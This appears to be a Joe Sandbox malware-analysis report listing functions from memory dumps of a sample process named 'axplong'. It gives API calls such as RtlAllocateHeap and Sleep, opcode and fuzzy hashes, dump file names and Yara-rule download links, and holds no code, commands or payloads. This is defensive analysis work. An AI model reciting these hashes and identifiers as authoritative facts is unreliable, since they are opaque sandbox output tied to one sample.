Associated: 00000007.00000002.3272775074.000000000053F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273086663.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273142777.00000000006DD000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_230000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f67fbb0c870a4e9f58faf04bc17ac7e3a247fe3ed6b9f7fd0be231a051585692
Instruction ID: c927ab88f7058d225e77ff797e12be89289a4960bc4b767bcd6803d82a8651a5
Opcode Fuzzy Hash: f67fbb0c870a4e9f58faf04bc17ac7e3a247fe3ed6b9f7fd0be231a051585692
Instruction Fuzzy Hash: 80210A71A256087AEB117F74AC4AB9F37299F42378F204310F9343B1D1DB705EA59AA1

Function 00266F71 Relevance: 1.6, APIs: 1, Instructions: 56
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00266FB3

Memory Dump Source

Source File: 00000007.00000002.3271829557.0000000000231000.00000040.00000001.01000000.00000007.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.3271785430.0000000000230000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271829557.0000000000292000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271953461.0000000000299000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000029B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000041C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.00000000004F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.0000000000527000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000052F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000053E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3272775074.000000000053F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273086663.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273142777.00000000006DD000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_230000_axplong.jbxd

Yara matches

Similarity

API ID: Time$LocalSpecificSystem
String ID:
API String ID: 2574697306-0
Opcode ID: 5506181f6a3eeb8a9614d987793c2dabe4c5c01606ac0eae47eabc8934f94db8
Instruction ID: 08a20de19002760aa7d26ac87f3836f139c727aadab1f0290fc044b240b4a7c9
Opcode Fuzzy Hash: 5506181f6a3eeb8a9614d987793c2dabe4c5c01606ac0eae47eabc8934f94db8
Instruction Fuzzy Hash: 2111127291010DABCB10DED5D888EDF77BC9B08310F504266E516E6180DB31EB58CBA1

Function 0026D6EF Relevance: 1.5, APIs: 1, Instructions: 40
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00000003,0026A5ED,?,002674AE,?,00000000,?), ref: 0026D731

Memory Dump Source

Source File: 00000007.00000002.3271829557.0000000000231000.00000040.00000001.01000000.00000007.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.3271785430.0000000000230000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271829557.0000000000292000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271953461.0000000000299000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000029B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000041C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.00000000004F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.0000000000527000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000052F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000053E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3272775074.000000000053F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273086663.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273142777.00000000006DD000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_230000_axplong.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 274cd2bb2871381a68ff38887dce40371fe55db3455a583e7d0a6e30058eeb64
Instruction ID: 87f876905a64c3add81e3e2472100e2aa2b3fd2edfb8a8e224c121b5dc28b0f2
Opcode Fuzzy Hash: 274cd2bb2871381a68ff38887dce40371fe55db3455a583e7d0a6e30058eeb64
Instruction Fuzzy Hash: 76F0E931F7513E67DB232F255D45B5BBB99DF817B0B194112AC049A181CE70D8F046E2

Function 0026AF0B Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,CE379C82,?,?,0024D32C,CE379C82,?,002478FB,?,?,?,?,?,?,00237435,?), ref: 0026AF3E

Memory Dump Source

Source File: 00000007.00000002.3271829557.0000000000231000.00000040.00000001.01000000.00000007.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.3271785430.0000000000230000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271829557.0000000000292000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271953461.0000000000299000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000029B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000041C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.00000000004F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.0000000000527000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000052F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000053E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3272775074.000000000053F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273086663.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273142777.00000000006DD000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_230000_axplong.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 023dc2ab9254eae8f2ee628a3744436700808eab78e380009a69957be4a08600
Instruction ID: bae4d56d24e9a06609a970eed01761f70228b7031bd044a63c8ffb56bd5d34dd
Opcode Fuzzy Hash: 023dc2ab9254eae8f2ee628a3744436700808eab78e380009a69957be4a08600
Instruction Fuzzy Hash: 53E02B7163621356DB203B656D4576B368CDF413B1F050151AC14B2881CF67CCF04DE3

Function 051E0C16 Relevance: 1.4, Strings: 1, Instructions: 124COMMON

Download Yara Rule

Strings

]`, xrefs: 051E0D15

Memory Dump Source

Source File: 00000007.00000002.3275839807.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_51e0000_axplong.jbxd

Similarity

API ID:
String ID: ]`
API String ID: 0-4031335893
Opcode ID: 1502816034441eb17b60df1641a3756ebd71d144354af92624a4645a8a9ee0ff
Instruction ID: ed0a1003e7c6cc6f9786a392b387bf12fb4839990c52f6d22d86821e25e2c974
Opcode Fuzzy Hash: 1502816034441eb17b60df1641a3756ebd71d144354af92624a4645a8a9ee0ff
Instruction Fuzzy Hash: D22156AF14C905AE511AE6941B9CAFA7F6EF58E73073248B6F403E6402E3D4464642B1

Function 051E0BB4 Relevance: 1.3, Strings: 1, Instructions: 93COMMON

Download Yara Rule

Strings

]`, xrefs: 051E0D15

Memory Dump Source

Source File: 00000007.00000002.3275839807.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_51e0000_axplong.jbxd

Similarity

API ID:
String ID: ]`
API String ID: 0-4031335893
Opcode ID: 2f134f247e84a7c913e449811060cf601199c24298532f165dbd173c429a35c5
Instruction ID: 96ff4d784a1b93a6503f8ecd0faf8af549f9e285189b4af06142590865d3ff75
Opcode Fuzzy Hash: 2f134f247e84a7c913e449811060cf601199c24298532f165dbd173c429a35c5
Instruction Fuzzy Hash: E71159BB00C905BD5116E6A55B4CAFA7FAEF5CAB707324C75F502E7403E3D409464171

Function 051E0BDE Relevance: 1.3, Strings: 1, Instructions: 84COMMON

Download Yara Rule

Strings

]`, xrefs: 051E0D15

Memory Dump Source

Source File: 00000007.00000002.3275839807.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_51e0000_axplong.jbxd

Similarity

API ID:
String ID: ]`
API String ID: 0-4031335893
Opcode ID: c0f9dd1098b2d3e9275be5fc356362392346a6419ad43a28b21e8da3ba6d5428
Instruction ID: c47f18e9456ff4738f1a2278a3991ed2e013418f4384e5a7835913196a30cf5b
Opcode Fuzzy Hash: c0f9dd1098b2d3e9275be5fc356362392346a6419ad43a28b21e8da3ba6d5428
Instruction Fuzzy Hash: 52119BBB148908BD9116E6A85B4C5FA3FDEE64EA707310CB6F002B7442D3E005474161

Function 051E0BCA Relevance: 1.3, Strings: 1, Instructions: 81COMMON

Download Yara Rule

Strings

]`, xrefs: 051E0D15

Memory Dump Source

Source File: 00000007.00000002.3275839807.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_51e0000_axplong.jbxd

Similarity

API ID:
String ID: ]`
API String ID: 0-4031335893
Opcode ID: 6c6051b66fd0245c9fd95e559ab2efd457c5a905f033b846ebc19fcf99b2fbdd
Instruction ID: 434b8e528d4b2450a0eb46c706b44364652ca31a41dbaf5d0fcd4f0661615d1a
Opcode Fuzzy Hash: 6c6051b66fd0245c9fd95e559ab2efd457c5a905f033b846ebc19fcf99b2fbdd
Instruction Fuzzy Hash: 4F115BBB10C905BD9216E6A45B4DAFA7F9EE68A7707324CB6F402E7403D3E405464161

Function 051E0B7A Relevance: 1.3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

Strings

]`, xrefs: 051E0D15

Memory Dump Source

Source File: 00000007.00000002.3275839807.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_51e0000_axplong.jbxd

Similarity

API ID:
String ID: ]`
API String ID: 0-4031335893
Opcode ID: b19235529799100fe87d26d778a970b991864e83b491e61041b182b7a4e40ea3
Instruction ID: aca0a2e70c33233b4925402d1dde056e4856a51c75a83f96db76d6d04c86c6bd
Opcode Fuzzy Hash: b19235529799100fe87d26d778a970b991864e83b491e61041b182b7a4e40ea3
Instruction Fuzzy Hash: 2B117D6B10CE04FE821AE6E45B4D6B57FAAB64F770B320CB9F503A7503D3E105428292

Function 051E0C41 Relevance: 1.3, Strings: 1, Instructions: 74COMMON

Download Yara Rule

Strings

]`, xrefs: 051E0D15

Memory Dump Source

Source File: 00000007.00000002.3275839807.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_51e0000_axplong.jbxd

Similarity

API ID:
String ID: ]`
API String ID: 0-4031335893
Opcode ID: 1970842b7579631d35d9824d878c545a72a1b11d300dc9bcb9e653af857f14dd
Instruction ID: 91d9ce60cece3e8cc12a12249841ae96ab4c77a892aef6ef8e75b8c4b9960354
Opcode Fuzzy Hash: 1970842b7579631d35d9824d878c545a72a1b11d300dc9bcb9e653af857f14dd
Instruction Fuzzy Hash: A6119C6610C901AE8617EAB8964E6F93FDAAA4F730B224DE9E442EB447C3D505438292

Function 051E0BFA Relevance: 1.3, Strings: 1, Instructions: 69COMMON

Download Yara Rule

Strings

]`, xrefs: 051E0D15

Memory Dump Source

Source File: 00000007.00000002.3275839807.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_51e0000_axplong.jbxd

Similarity

API ID:
String ID: ]`
API String ID: 0-4031335893
Opcode ID: 0a73b2f0d476cbaa26e4c31d1f56220406b40aca8f16c33b6c83a9686e092326
Instruction ID: e254591a62a4b531adf13cb7c998f7dbd06e1eb2432b3182b1633c2db065678a
Opcode Fuzzy Hash: 0a73b2f0d476cbaa26e4c31d1f56220406b40aca8f16c33b6c83a9686e092326
Instruction Fuzzy Hash: 53119C79008A05EEC71AEAA4864DAB97FDAAB4E620B224DB9F542A7546C3E144424281

Function 051E0C2E Relevance: 1.3, Strings: 1, Instructions: 58COMMON

Download Yara Rule

Strings

]`, xrefs: 051E0D15

Memory Dump Source

Source File: 00000007.00000002.3275839807.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_51e0000_axplong.jbxd

Similarity

API ID:
String ID: ]`
API String ID: 0-4031335893
Opcode ID: 3d13e59395cbe0e387aced9aef10bdaa61ca34be63cd3b2eba8ff7f3f0825da4
Instruction ID: 2dd1745468ef6b180b5b5c7bd7a3d35bc0258df9a665cd3b943a9acdd59fae15
Opcode Fuzzy Hash: 3d13e59395cbe0e387aced9aef10bdaa61ca34be63cd3b2eba8ff7f3f0825da4
Instruction Fuzzy Hash: 6101C07A108605BE8206B6B85B4CAFA3FDAAA4E670B214D75F502F7447C3E504434251

Function 051E0C87 Relevance: 1.3, Strings: 1, Instructions: 56COMMON

Download Yara Rule

Strings

]`, xrefs: 051E0D15

Memory Dump Source

Source File: 00000007.00000002.3275839807.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_51e0000_axplong.jbxd

Similarity

API ID:
String ID: ]`
API String ID: 0-4031335893
Opcode ID: 7ce8f50757a98d30d95c64bc90b1a4895665e6c713faa6b90766a77bf2281fc4
Instruction ID: 9fcc2b61a88b21a12cb3a9fface749cdd4f35f3bda801dc94b19cdcc78947409
Opcode Fuzzy Hash: 7ce8f50757a98d30d95c64bc90b1a4895665e6c713faa6b90766a77bf2281fc4
Instruction Fuzzy Hash: E901CBB62086069FC312B6B88B1C2FE7BD4AA8B670B204D7EE102D7087C3C504430251

Function 051E0C26 Relevance: 1.3, Strings: 1, Instructions: 55COMMON

Download Yara Rule

Strings

]`, xrefs: 051E0D15

Memory Dump Source

Source File: 00000007.00000002.3275839807.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_51e0000_axplong.jbxd

Similarity

API ID:
String ID: ]`
API String ID: 0-4031335893
Opcode ID: d5e85f984bb9d2dc2d00970a9a325bc270844d31c11b8dbf005babd286b99e92
Instruction ID: 8f08fc26e8496d582ddb2b4e9a5043fc5354446249223b3e26c666f0fa501f51
Opcode Fuzzy Hash: d5e85f984bb9d2dc2d00970a9a325bc270844d31c11b8dbf005babd286b99e92
Instruction Fuzzy Hash: EB01FE7A108A05BE8206F6B84B0DAF93FDEEA4EA70B214CB5F502B7043C3D504430291

Function 051E0C6D Relevance: 1.3, Strings: 1, Instructions: 49COMMON

Download Yara Rule

Strings

]`, xrefs: 051E0D15

Memory Dump Source

Source File: 00000007.00000002.3275839807.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_51e0000_axplong.jbxd

Similarity

API ID:
String ID: ]`
API String ID: 0-4031335893
Opcode ID: a7387e28cb91745f4fcc8fd8258aee7875190d1f24c6074be25f7e335c1ce8d4
Instruction ID: dfe4cff30f879d632699a5c2b31c20d2eedb397b59c125ea4fd1df711c802e72
Opcode Fuzzy Hash: a7387e28cb91745f4fcc8fd8258aee7875190d1f24c6074be25f7e335c1ce8d4
Instruction Fuzzy Hash: F5F0A2572086065EC302B2BC5B583FD7F989A8AA70B354D7AE542D7187D3C504430261

Function 00246AE0 Relevance: 1.3, APIs: 1, Instructions: 40sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 00246B65

Memory Dump Source

Source File: 00000007.00000002.3271829557.0000000000231000.00000040.00000001.01000000.00000007.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.3271785430.0000000000230000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271829557.0000000000292000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271953461.0000000000299000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000029B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000041C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.00000000004F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.0000000000527000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000052F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000053E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3272775074.000000000053F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273086663.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273142777.00000000006DD000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_230000_axplong.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 43f8a41e8aa566a3c0d4ad34d10fbe486821d7ea8e85e0e9661f612559bedca0
Instruction ID: 14c4f65e3351f4a5a06a2e7e54a569e7c02e5551a1fca4f42971f25437b81332
Opcode Fuzzy Hash: 43f8a41e8aa566a3c0d4ad34d10fbe486821d7ea8e85e0e9661f612559bedca0
Instruction Fuzzy Hash: 64F0D671A20514BBC604BBA89C0671DBB65AB07764F800348E825672E1DB305A244BD3

Non-executed Functions

Function 00273068 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1340COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 002731E3

Strings

1#SNAN, xrefs: 0027437A
1#INF, xrefs: 0027439E
1#QNAN, xrefs: 00274381
1#IND, xrefs: 00274373

Memory Dump Source

Source File: 00000007.00000002.3271829557.0000000000231000.00000040.00000001.01000000.00000007.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.3271785430.0000000000230000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271829557.0000000000292000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271953461.0000000000299000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000029B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000041C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.00000000004F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.0000000000527000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000052F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000053E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3272775074.000000000053F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273086663.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273142777.00000000006DD000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_230000_axplong.jbxd

Yara matches

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 361565234bd256b8bdead470f4103cd8d2b9d7a10019b2ca5d0245a9bbf900dc
Instruction ID: 49d02ddc89d7b40c27e0ce4bfcd60658cef3b1aef32b366e1f8f4cca3e74fd04
Opcode Fuzzy Hash: 361565234bd256b8bdead470f4103cd8d2b9d7a10019b2ca5d0245a9bbf900dc
Instruction Fuzzy Hash: 4EC26D71E246298FDB25DF28DD407EAB3B9EB48304F1481EAD84DE7240E774AE919F41

Function 00272BD0 Relevance: 3.4, APIs: 2, Instructions: 450COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3271829557.0000000000231000.00000040.00000001.01000000.00000007.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.3271785430.0000000000230000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271829557.0000000000292000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271953461.0000000000299000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000029B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000041C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.00000000004F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.0000000000527000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000052F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000053E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3272775074.000000000053F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273086663.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273142777.00000000006DD000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_230000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
Instruction ID: 6a6e4382ee9872502f67127914a49c0fe382d4f4e93f1ff3b546ebc0bf7912e8
Opcode Fuzzy Hash: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
Instruction Fuzzy Hash: 76F14E71E1021ADFDF14CFA9C8806AEB7B1FF48314F15826AD819AB345D731AE55CB90

Function 0024CB1A Relevance: 1.5, APIs: 1, Instructions: 16timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimePreciseAsFileTime.KERNEL32(?,0024CE82,?,?,?,?,0024CEB7,?,?,?,?,?,?,0024C42D,?,00000001), ref: 0024CB33

Memory Dump Source

Source File: 00000007.00000002.3271829557.0000000000231000.00000040.00000001.01000000.00000007.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.3271785430.0000000000230000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271829557.0000000000292000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271953461.0000000000299000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000029B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000041C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.00000000004F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.0000000000527000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000052F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000053E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3272775074.000000000053F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273086663.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273142777.00000000006DD000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_230000_axplong.jbxd

Yara matches

Similarity

API ID: Time$FilePreciseSystem
String ID:
API String ID: 1802150274-0
Opcode ID: eff40ccde5ccbdde9616cfb1fe246d8b128a36f488500b3da1d8d01db9251e9c
Instruction ID: 0ab5d6ef9c0b93b2f69aea524135be8b8807695fccada1548da259b99be0bf5f
Opcode Fuzzy Hash: eff40ccde5ccbdde9616cfb1fe246d8b128a36f488500b3da1d8d01db9251e9c
Instruction Fuzzy Hash: 13D0223662303893CA9A2B98BC0C8ACBB0CCF44B543100112EC0563130CBD06C504BD0

Function 00267D83 Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

0, xrefs: 00267EFF

Memory Dump Source

Source File: 00000007.00000002.3271829557.0000000000231000.00000040.00000001.01000000.00000007.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.3271785430.0000000000230000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271829557.0000000000292000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271953461.0000000000299000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000029B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000041C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.00000000004F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.0000000000527000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000052F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000053E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3272775074.000000000053F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273086663.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273142777.00000000006DD000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_230000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
Instruction ID: aaa3df2b95250d96cc5c4278e6e83e665725231bafc4b7346db8e9a54c0f2cd8
Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
Instruction Fuzzy Hash: A351997023C64A97DB388E38B8957BE679A9F1230CF140999D442C7AC2DB539DF88751

Function 00234CF0 Relevance: .7, Instructions: 701COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3271829557.0000000000231000.00000040.00000001.01000000.00000007.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.3271785430.0000000000230000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271829557.0000000000292000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271953461.0000000000299000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000029B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000041C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.00000000004F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.0000000000527000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000052F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000053E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3272775074.000000000053F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273086663.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273142777.00000000006DD000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_230000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbdda13ceacced857910bf096259ea661e9e7d2c4d8274a33528f8f7301c543a
Instruction ID: 1a20f9731879c3b771f2c4f6688a087c478eb3d207cc74488c593cc6fec3c87e
Opcode Fuzzy Hash: dbdda13ceacced857910bf096259ea661e9e7d2c4d8274a33528f8f7301c543a
